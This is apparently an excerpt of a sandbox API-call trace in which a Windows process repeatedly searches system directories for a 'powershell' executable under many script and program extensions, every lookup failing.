	[0866.477] SetErrorMode (uMode=0x1) returned 0x1
	[0866.479] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0866.479] SetErrorMode (uMode=0x1) returned 0x1
	[0866.479] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0869.572] SetErrorMode (uMode=0x1) returned 0x1
	[0869.573] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0869.573] SetErrorMode (uMode=0x1) returned 0x1
	[0869.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.259] SetErrorMode (uMode=0x1) returned 0x1
	[0871.261] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.261] SetErrorMode (uMode=0x1) returned 0x1
	[0871.339] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.950] SetErrorMode (uMode=0x1) returned 0x1
	[0871.952] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0871.952] SetErrorMode (uMode=0x1) returned 0x1
	[0871.952] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.960] SetErrorMode (uMode=0x1) returned 0x1
	[0871.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.962] SetErrorMode (uMode=0x1) returned 0x1
	[0871.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.ps1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.962] SetErrorMode (uMode=0x1) returned 0x1
	[0871.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.963] SetErrorMode (uMode=0x1) returned 0x1
	[0871.963] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psm1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.963] SetErrorMode (uMode=0x1) returned 0x1
	[0871.963] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.964] SetErrorMode (uMode=0x1) returned 0x1
	[0871.964] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.psd1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.964] SetErrorMode (uMode=0x1) returned 0x1
	[0871.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.964] SetErrorMode (uMode=0x1) returned 0x1
	[0871.964] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.COM", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.965] SetErrorMode (uMode=0x1) returned 0x1
	[0871.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.965] SetErrorMode (uMode=0x1) returned 0x1
	[0871.965] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.EXE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.965] SetErrorMode (uMode=0x1) returned 0x1
	[0871.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.965] SetErrorMode (uMode=0x1) returned 0x1
	[0871.966] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.966] SetErrorMode (uMode=0x1) returned 0x1
	[0871.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.966] SetErrorMode (uMode=0x1) returned 0x1
	[0871.966] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.966] SetErrorMode (uMode=0x1) returned 0x1
	[0871.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.967] SetErrorMode (uMode=0x1) returned 0x1
	[0871.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.967] SetErrorMode (uMode=0x1) returned 0x1
	[0871.967] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.967] SetErrorMode (uMode=0x1) returned 0x1
	[0871.967] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.968] SetErrorMode (uMode=0x1) returned 0x1
	[0871.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.968] SetErrorMode (uMode=0x1) returned 0x1
	[0871.968] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.968] SetErrorMode (uMode=0x1) returned 0x1
	[0871.968] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.969] SetErrorMode (uMode=0x1) returned 0x1
	[0871.969] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.969] SetErrorMode (uMode=0x1) returned 0x1
	[0871.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.969] SetErrorMode (uMode=0x1) returned 0x1
	[0871.969] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.970] SetErrorMode (uMode=0x1) returned 0x1
	[0871.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.970] SetErrorMode (uMode=0x1) returned 0x1
	[0871.970] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.970] SetErrorMode (uMode=0x1) returned 0x1
	[0871.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.971] SetErrorMode (uMode=0x1) returned 0x1
	[0871.971] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.971] SetErrorMode (uMode=0x1) returned 0x1
	[0871.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0871.971] SetErrorMode (uMode=0x1) returned 0x1
	[0871.971] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.972] SetErrorMode (uMode=0x1) returned 0x1
	[0871.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.972] SetErrorMode (uMode=0x1) returned 0x1
	[0871.972] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.972] SetErrorMode (uMode=0x1) returned 0x1
	[0871.972] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.972] SetErrorMode (uMode=0x1) returned 0x1
	[0871.973] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.973] SetErrorMode (uMode=0x1) returned 0x1
	[0871.973] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.973] SetErrorMode (uMode=0x1) returned 0x1
	[0871.973] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.973] SetErrorMode (uMode=0x1) returned 0x1
	[0871.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.974] SetErrorMode (uMode=0x1) returned 0x1
	[0871.974] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.974] SetErrorMode (uMode=0x1) returned 0x1
	[0871.974] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.974] SetErrorMode (uMode=0x1) returned 0x1
	[0871.975] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.975] SetErrorMode (uMode=0x1) returned 0x1
	[0871.975] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.975] SetErrorMode (uMode=0x1) returned 0x1
	[0871.975] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.975] SetErrorMode (uMode=0x1) returned 0x1
	[0871.976] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.976] SetErrorMode (uMode=0x1) returned 0x1
	[0871.976] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.976] SetErrorMode (uMode=0x1) returned 0x1
	[0871.976] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.976] SetErrorMode (uMode=0x1) returned 0x1
	[0871.976] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.977] SetErrorMode (uMode=0x1) returned 0x1
	[0871.977] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.977] SetErrorMode (uMode=0x1) returned 0x1
	[0871.977] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.977] SetErrorMode (uMode=0x1) returned 0x1
	[0871.977] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.978] SetErrorMode (uMode=0x1) returned 0x1
	[0871.978] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.978] SetErrorMode (uMode=0x1) returned 0x1
	[0871.978] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.978] SetErrorMode (uMode=0x1) returned 0x1
	[0871.978] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c91d9e0 | out: lpFindFileData=0x1c91d9e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0871.979] SetErrorMode (uMode=0x1) returned 0x1
	[0871.979] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c91d840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0871.979] SetErrorMode (uMode=0x1) returned 0x1
